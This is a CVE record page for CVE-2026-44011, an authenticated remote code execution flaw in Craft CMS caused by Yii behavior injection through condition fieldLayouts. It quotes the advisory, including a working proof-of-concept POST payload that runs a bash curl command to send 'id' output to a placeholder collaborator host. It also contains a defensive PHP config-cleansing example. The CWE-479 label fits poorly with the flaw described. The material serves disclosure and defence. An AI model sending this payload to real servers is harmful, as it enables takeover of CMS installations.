Published: 2026-05-12 20:25
CVE ID: CVE-2026-44011
Assigner: GitHub_M
State: PUBLISHED
Data version: 5.2
Problem type: CWE-479

Craft CMS: Potential authenticated Remote Code Execution via malicious attached Behavior

Craft CMS is a content management system (CMS). From 4.0.0 to before 4.17.12 and 5.9.18, Craft CMS contains an input-handling flaw in a Yii object creation path that lets any authenticated user inject malicious configuration and execute arbitrary commands on the server. The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This vulnerability is fixed in 4.17.12 and 5.9.18.

Problem type

CWE-479: Signal Handler Use of a Non-reentrant Function

Affected products

craftcms

cms

>= 4.0.0, < 4.17.12 - AFFECTED

>= 5.0.0, < 5.9.18 - AFFECTED

References

GitHub Security Advisories

GHSA-qrgm-p9w5-rrfw

Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior

https://github.com/advisories/GHSA-qrgm-p9w5-rrfw

We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that lets any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.

This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.

The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.

This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.

We were able to reproduce the attack by issuing a POST request to /admin/actions/element-search/search with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same beforeAction() path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:

POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;
Content-Length: …
User-Agent: Mozilla/5.0
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json

{
 "elementType": "craft\\elements\\Category",
 "siteId": 1,
 "search": "",
 "condition": {
   "class": "craft\\elements\\conditions\\ElementCondition",
   "elementType": "craft\\elements\\Category",
   "fieldLayouts": [
     {
       "as rce": {
         "__class": "yii\\behaviors\\AttributeTypecastBehavior",
         "__construct()": [
           {
             "attributeTypes": {
               "typecastBeforeSave": [
                 "Psy\\Readline\\Hoa\\ConsoleProcessus",
                 "execute"
               ]
             },
             "typecastBeforeSave": "/bin/bash -c \"curl https://yourcollaboratorservergoeshere/`id`\""
           }
         ]
       },
       "on *": "self::beforeSave"
     }
   ]
 }
}
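The Component::cleanseConfig() boundary that the advisory says is missing on the condition / fieldLayouts hydration path can be illustrated with a standalone cleanser that runs before any request-controlled config reaches Craft::createObject(). This is an added example written for this page, not Craft's own implementation; the function name, the key list and the sample payload are assumptions, and the sample is constructed with benign values:

```php
<?php
// Added example (not Craft's code): recursively strip the Yii "special" config
// keys that Yii::configure() / createObject() interpret while an object is still
// being built, so request-controlled condition/fieldLayouts data can never
// attach a behavior ("as <name>"), bind an event handler ("on <event>"), swap
// the class ("__class") or feed constructor arguments ("__construct()").
// The top-level "class" key is deliberately left alone: the caller should
// validate it against an allow-list of permitted condition classes instead.
function stripSpecialConfigKeys(array $config, array &$dropped = []): array
{
    $clean = [];
    foreach ($config as $key => $value) {
        if (is_string($key)) {
            $k = trim($key);
            if (
                str_starts_with($k, 'as ') ||   // behavior attachment
                str_starts_with($k, 'on ') ||   // event handler binding
                in_array($k, ['__class', '__construct()'], true)
            ) {
                $dropped[] = $key;              // record for logging/alerting
                continue;
            }
        }
        // Recurse so nested fieldLayouts entries are cleansed as well.
        $clean[$key] = is_array($value) ? stripSpecialConfigKeys($value, $dropped) : $value;
    }
    return $clean;
}

// Constructed sample shaped like the advisory's condition payload (benign values).
$untrusted = [
    'class' => 'craft\\elements\\conditions\\ElementCondition',
    'elementType' => 'craft\\elements\\Category',
    'fieldLayouts' => [
        [
            'as injected' => ['__class' => 'SomeBehavior'],
            'on *' => 'self::beforeSave',
            'type' => 'craft\\elements\\Category',
        ],
    ],
];

$dropped = [];
$safe = stripSpecialConfigKeys($untrusted, $dropped);
// $dropped holds ['as injected', 'on *'] (the nested __class went with its parent);
// $safe keeps class, elementType and fieldLayouts[0]['type'] only.
print_r($dropped);
print_r($safe);
```

A non-empty $dropped list on a request-controlled path is itself a useful detection signal, since legitimate control-panel requests never need to attach behaviors or event handlers through JSON.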

Resources

https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3

JSON source

https://cveawg.mitre.org/api/cve/CVE-2026-44011
{
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "cveMetadata": {
    "cveId": "CVE-2026-44011",
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "dateUpdated": "2026-05-12T20:25:08.183Z",
    "dateReserved": "2026-05-04T21:24:36.505Z",
    "datePublished": "2026-05-12T20:25:08.183Z",
    "state": "PUBLISHED"
  },
  "containers": {
    "cna": {
      "providerMetadata": {
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M",
        "dateUpdated": "2026-05-12T20:25:08.183Z"
      },
      "title": "Craft CMS: Potential authenticated Remote Code Execution via malicious attached Behavior",
      "descriptions": [
        {
          "lang": "en",
          "value": "Craft CMS is a content management system (CMS). From 4.0.0 to before 4.17.12 and 5.9.18, Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This vulnerability is fixed in 4.17.12 and 5.9.18."
        }
      ],
      "affected": [
        {
          "vendor": "craftcms",
          "product": "cms",
          "versions": [
            {
              "version": ">= 4.0.0, < 4.17.12",
              "status": "affected"
            },
            {
              "version": ">= 5.0.0, < 5.9.18",
              "status": "affected"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-479: Signal Handler Use of a Non-reentrant Function",
              "cweId": "CWE-479",
              "type": "CWE"
            }
          ]
        }
      ],
      "references": [
        {
          "url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw",
          "name": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw",
          "tags": [
            "x_refsource_CONFIRM"
          ]
        },
        {
          "url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
          "name": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
          "tags": [
            "x_refsource_MISC"
          ]
        }
      ],
      "metrics": [
        {}
      ]
    }
  }
}